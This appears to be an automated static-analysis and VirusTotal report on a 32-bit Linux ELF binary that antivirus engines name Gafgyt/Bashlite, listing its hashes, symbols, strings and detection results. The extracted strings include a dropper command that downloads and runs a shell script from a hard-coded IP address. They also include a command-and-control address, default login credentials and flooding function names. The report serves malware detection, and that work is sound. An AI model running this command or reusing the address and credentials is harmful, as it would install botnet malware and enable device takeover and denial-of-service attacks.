Report #3481

Binary
ABI
ELFOSABI_SYSV
Size
62.78KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
7b14c57918df578a14c300c788644701
sha1
e6ff619f993eb772d06b0e142790a22f3e2188aa
crc32
0x14779bdc
sha224
c3715e777c86de4abcd7b9cfd9ebd02c343df2ef2423fbebf18b0335
sha256
2d3ebed2054f91563736a938d884a9bf6b144fd157602a65119120785c93c13a
sha384
c3b927cc9735bbb333b512722a206fe2e2690ddf5e0a4353b6905812e660110d35b25a36f4c50f411f44c8de0dfb7ab2
sha512
53f53d61bee750aa3201063508b6cc03ab81359b4fcdd72b25705cd968ded2f14c0fae12f3efea17249d8fc543e23ca4e8d2b38f2cff3aaf4f0f169239e42219
ssdeep
1536:k0NDvv4T+0rg9V1j6uptP0nX82IZU6Q/AFdfZ9DrNJK:k0ua089V1j6upw82p6LFdfq
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
212.237.53.46:777, cd /tmp || cd /var/run;wget http://212.237.53.46/wbin.sh;sh wbin.sh;rm -rf wbin.sh;rm -rf wbin.sh
URLs
cd /tmp || cd /var/run;wget http://212.237.53.46/wbin.sh;sh wbin.sh;rm -rf wbin.sh;rm -rf wbin.sh
Mails

Suspicious
True
Strings
List
cd /tmp || cd /var/run;wget http://212.237.53.46/wbin.sh;sh wbin.sh;rm -rf wbin.sh;rm -rf wbin.sh
212.237.53.46:777
.got.plt
None Killed.
Killed %d.
been_there_done_that.2832
been_there_done_that
_fwrite.c
open.c
write.c
fork failed
pass
REPORT %s:%s:%s
My IP: %s
Invalid flag "%s"
8.8.8.8
[cpuset]
__GI_execl
__GI_fflush_unlocked
PONG!
__libc_nanosleep
__GI_sleep
__socketcall
__GI_execve
__register_frame_info_bases
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
__socketcall.c
fflush_unlocked
socket.c
__GI_socket
sleep.c
sendHTTP
tcpcsum
@login guest kek
PONG
HTTP
commServer
pipe.c
inet_addr
currentServer
makeIPPacket
usernames
KILLATTK
random_poly_info
random.c
random_r
changeme
nanosleep
srandom_r
__GI_random_r
password
sendTCP
fwrite_unlocked
processCmd
random_r.c
__GI_srandom_r
passwords
getHost
__GI_random
connect
sleep
guest
makeRandomStr
getRandomIP
socket
admin
GETLOCALIP
shell
system
srandom
recv
send
random
FAILED TO CONNECT
getpagesize.c
__getpagesize
__GI_getpagesize
waitpid.c
getpid.c
__libc_getpid
completed.2429
Failed opening raw socket.
__libc_waitpid
object.2482
__GI_waitpid
fseeko64.c
__GI_getpid
next_start.1109
.comment
__GI_dup2
__GI_wait4
__GI_fseeko64
ulti-call
__CTOR_END__
__DTOR_END__

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4251, printchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, puts.c, popen.c, mylock, popen_list, _stdio.c, _stdio_streams, __stdio_mutex_initializer.3991, _fixed_buffers, _wcommit.c, fputc_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen.c, strstr.c, strtok.c, next_start.1109, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2658, inet_makeaddr.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.2832, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, fclose.c, fdopen.c, _WRITE.c, _fopen.c, _fwrite.c, _trans2w.c, _uintmaxtostr.c, fflush_unlocked.c, 
memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, raise.c, dl-support.c, brk.c, fseeko.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, rawmemchr.c, strspn.c, llseek.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, waitpid, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, popen, sysconf, stdout, random, __GI_getpagesize, getdtablesize, __GI_h_errno, __GI___ctype_toupper, putc_unlocked, recv, connect, __GI___uClibc_fini, numpids, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, __GI_setsid, sendTCP, pclose, __bsd_signal, __GI_strpbrk, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, __ctype_b, __GI_random_r, usernames, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, getHost, __libc_getpid, wildString, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, puts, __GI___C_ctype_toupper, __libc_nanosleep, trim, dup2, __pthread_mutex_init, getuid, system, malloc, isatty, sleep, __GI_atol, __GI_read, random_r, __dso_handle, clock_getres, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_write, __ctype_toupper, __libc_read, __GI_open, __GI_strchr, sigaddset, __GI_tcgetattr, __environ, mmap, makeIPPacket, sockprintf, __GI_inet_ntoa, send, abort, __GI_fcntl, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, 
__libc_lseek64, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, write, environ, __GI_close, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_brk, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, setstate, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, getCores, __GI_memcpy, _stdio_user_locking, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, __libc_send, currentServer, __GI_getrlimit, __GI_strcpy, strtok, __GI___fputc_unlocked, __stdio_adjust_position, malloc_trim, fdopen, fork, gotIP, __GI_sleep, sigaction, _dl_phdr, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, __bss_start, __libc_open, getOurIP, memset, __GI_socket, main, listFork, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, time, __libc_system, __GI_abort, fdpopen, __stdio_init_mutex, __GI__exit, data_start, __GI_sysconf, __h_errno_location, __GI_putc_unlocked, matchPrompt, __C_ctype_b_data, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, fdgets, __get_pc_thunk_bx, __GI_select, __libc_waitpid, __GI_waitpid, _stdio_term, __GI_signal, stderr, commServer, vfork, __C_ctype_b, srandom, __GI_sendto, __GI_sigemptyset, __libc_fork, __atexit_lock, scanPid, rand_cmwc, 
__libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, _end, htons, _sigintr, __GI_strspn, initstate_r, __GI_connect, __curbrk, _dl_phnum, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, brk, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_del_lock, __GI_inet_aton, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, _Jv_RegisterClasses, macAddress, __GI___errno_location, fputc_unlocked, readUntil, fcntl, __GI_fdopen, __GI_atoi, fseeko64, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, sendHOLD, mainCommSock, pids, strpbrk, getBogos, raise, free, sigprocmask, __fputc_unlocked, getsockname
Number
567
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, 
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
117
Suspicious
True
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4251, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getrlimit.c, , ioctl.c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , puts.c, , popen.c, , mylock, , popen_list, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.3991, , _fixed_buffers, , _wcommit.c, , fputc_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcpy.c, , strlen.c, , strstr.c, , strtok.c, , next_start.1109, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2658, , inet_makeaddr.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.2832, , sigaction.c, , __restore_rt, , __restore, , 
__syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , errno.c, , fclose.c, , fdopen.c, , _WRITE.c, , _fopen.c, , _fwrite.c, , _trans2w.c, , _uintmaxtostr.c, , fflush_unlocked.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , raise.c, , dl-support.c, , brk.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , rawmemchr.c, , strspn.c, , llseek.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , waitpid, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , popen, , sysconf, , stdout, , random, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , __GI___ctype_toupper, , putc_unlocked, , recv, , connect, , __GI___uClibc_fini, , numpids, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , __GI_setsid, , sendTCP, , pclose, , __bsd_signal, , __GI_strpbrk, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , getHost, , __libc_getpid, , wildString, , fcntl64, , prctl, , memcpy, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , puts, , 
__GI___C_ctype_toupper, , __libc_nanosleep, , trim, , dup2, , __pthread_mutex_init, , getuid, , system, , malloc, , isatty, , sleep, , __GI_atol, , __GI_read, , random_r, , __dso_handle, , clock_getres, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_write, , __ctype_toupper, , __libc_read, , __GI_open, , __GI_strchr, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , abort, , __GI_fcntl, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_execl, , __GI_srandom_r, , write, , environ, , __GI_close, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , strcat, , __GI_brk, , __GI_strcat, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , setstate, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , getCores, , __GI_memcpy, , _stdio_user_locking, , htonl, , sendto, , __C_ctype_toupper, , StartTheLelz, , __GI___C_ctype_b, , __libc_send, , currentServer, , __GI_getrlimit, , __GI_strcpy, , strtok, , __GI___fputc_unlocked, , __stdio_adjust_position, , malloc_trim, , fdopen, , fork, , gotIP, , __GI_sleep, , sigaction, , _dl_phdr, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , __getpagesize, , 
__GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , __bss_start, , __libc_open, , getOurIP, , memset, , __GI_socket, , main, , listFork, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetattr, , time, , __libc_system, , __GI_abort, , fdpopen, , __stdio_init_mutex, , __GI__exit, , data_start, , __GI_sysconf, , __h_errno_location, , __GI_putc_unlocked, , matchPrompt, , __C_ctype_b_data, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , fdgets, , __get_pc_thunk_bx, , __GI_select, , __libc_waitpid, , __GI_waitpid, , _stdio_term, , __GI_signal, , stderr, , commServer, , vfork, , __C_ctype_b, , srandom, , __GI_sendto, , __GI_sigemptyset, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , _end, , htons, , _sigintr, , __GI_strspn, , initstate_r, , __GI_connect, , __curbrk, , _dl_phnum, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , sendJUNK, , _errno, , atoi, , _stdio_openlist_del_lock, , __GI_inet_aton, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , _Jv_RegisterClasses, , 
macAddress, , __GI___errno_location, , fputc_unlocked, , readUntil, , fcntl, , __GI_fdopen, , __GI_atoi, , fseeko64, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , strpbrk, , getBogos, , raise, , free, , sigprocmask, , __fputc_unlocked, , getsockname,
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048164
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
48040
AVclass
gafgyt
1
VirusTotal
md5
7b14c57918df578a14c300c788644701
sha1
e6ff619f993eb772d06b0e142790a22f3e2188aa
SCANS (DETECTION RATE = 62.71%)
AVG
result: ELF:Gafgyt-AG [Trj]
update: 20190118
version: 18.4.3895.0
detected: True

CMC
update: 20190118
version: 1.1.0.977
detected: False

MAX
result: malware (ai score=100)
update: 20190119
version: 2018.9.12.1
detected: True

Bkav
update: 20190118
version: 1.3.0.9899
detected: False

K7GW
update: 20190118
version: 11.23.29726
detected: False

ALYac
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 1.1.1.5
detected: True

Avast
result: ELF:Gafgyt-AG [Trj]
update: 20190119
version: 18.4.3895.0
detected: True

Avira
result: LINUX/Gafgyt.tqnog
update: 20190119
version: 8.3.3.8
detected: True

Baidu
update: 20190118
version: 1.0.0.2
detected: False

Cyren
update: 20190118
version: 6.2.0.1
detected: False

DrWeb
result: Linux.BackDoor.Fgt.46
update: 20190118
version: 7.0.34.11020
detected: True

GData
result: Generic.Gafgyt.1.63B936BB
update: 20190119
version: A:25.20231B:25.14174
detected: True

Panda
update: 20190118
version: 4.6.4.2
detected: False

VBA32
update: 20190118
version: 3.35.1
detected: False

Zoner
update: 20190119
version: 1.0
detected: False

AVware
update: 20180925
version: 1.6.0.52
detected: False

ClamAV
update: 20190118
version: 0.101.1.0
detected: False

Comodo
result: Malware@#35u24in89pl2c
update: 20190119
version: 30296
detected: True

F-Prot
update: 20190118
version: 4.7.1.166
detected: False

Ikarus
result: Trojan.Linux.Gafgyt
update: 20190118
version: 0.1.5.2
detected: True

McAfee
result: Linux/Gafgyt.f
update: 20190119
version: 6.0.6.653
detected: True

Rising
result: Trojan.Gafgyt/Linux!1.A480 (CLASSIC)
update: 20190119
version: 25.0.0.24
detected: True

Sophos
result: Linux/DDoS-BI
update: 20190119
version: 4.98.0
detected: True

Yandex
update: 20190118
version: 5.5.1.3
detected: False

Zillya
result: Backdoor.Gafgyt.Linux.9991
update: 20190118
version: 2.0.0.3733
detected: True

Arcabit
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 1.0.0.837
detected: True

Babable
update: 20180918
version: 9107201
detected: False

TACHYON
update: 20190119
version: 2019-01-19.01
detected: False

Tencent
result: backdoor.linux.gafgyt.z
update: 20190119
version: 1.0.0.1
detected: True

ViRobot
update: 20190118
version: 2014.3.20.0
detected: False

Ad-Aware
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 3.0.5.370
detected: True

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20190119
version: 4.2
detected: True

Emsisoft
result: Generic.Gafgyt.1.63B936BB (B)
update: 20190118
version: 2018.4.0.1029
detected: True

F-Secure
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 11.0.19100.45
detected: True

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20190118
version: 5.4.247.0
detected: True

Jiangmin
result: Backdoor.Linux.thr
update: 20190119
version: 16.0.100
detected: True

Kingsoft
update: 20190119
version: 2013.8.14.323
detected: False

Symantec
result: Linux.Lightaidra
update: 20190118
version: 1.8.0.0
detected: True

AhnLab-V3
result: Linux/Gafgyt.Gen
update: 20190118
version: 3.14.1.22785
detected: True

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.d
update: 20190119
version: 3.0.0.1
detected: True

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20190119
version: 15.0.1.13
detected: True

Microsoft
result: DDoS:Linux/Lightaidra
update: 20190119
version: 1.1.15500.2
detected: True

Qihoo-360
result: Win32/Backdoor.acf
update: 20190119
version: 1.0.0.1120
detected: True

TheHacker
update: 20190118
version: 6.8.0.5.3962
detected: False

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20190119
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20190119
version: 18730
detected: True

TrendMicro
update: 20190119
version: 10.0.0.1040
detected: False

BitDefender
result: Generic.Gafgyt.1.63B936BB
update: 20190118
version: 7.2
detected: True

K7AntiVirus
update: 20190118
version: 11.23.29725
detected: False

SentinelOne
result: static engine - malicious
update: 20190118
version: 1.0.21.268
detected: True

Avast-Mobile
result: ELF:Mirai-DG [Trj]
update: 20190118
version: 190118-00
detected: True

Malwarebytes
update: 20190119
version: 2.1.1.1115
detected: False

TotalDefense
update: 20190118
version: 37.1.62.1
detected: False

CAT-QuickHeal
result: Exploit.Linux.Shellshock.A
update: 20190118
version: 14.00
detected: True

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eikqfj
update: 20190119
version: 1.0.134.24576
detected: True

MicroWorld-eScan
result: Generic.Gafgyt.1.63B936BB
update: 20190119
version: 14.0.297.0
detected: True

SUPERAntiSpyware
update: 20190116
version: 5.6.0.1032
detected: False

McAfee-GW-Edition
result: Linux/Gafgyt.f
update: 20190118
version: v2017.3010
detected: True

TrendMicro-HouseCall
result: ELF_BASHLITE.SMC
update: 20190119
version: 10.0.0.1040
detected: True

total
59
sha256
2d3ebed2054f91563736a938d884a9bf6b144fd157602a65119120785c93c13a
scan_id
2d3ebed2054f91563736a938d884a9bf6b144fd157602a65119120785c93c13a-1547862914
resource
7b14c57918df578a14c300c788644701
positives
37
scan_date
2019-01-19 01:55:14
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True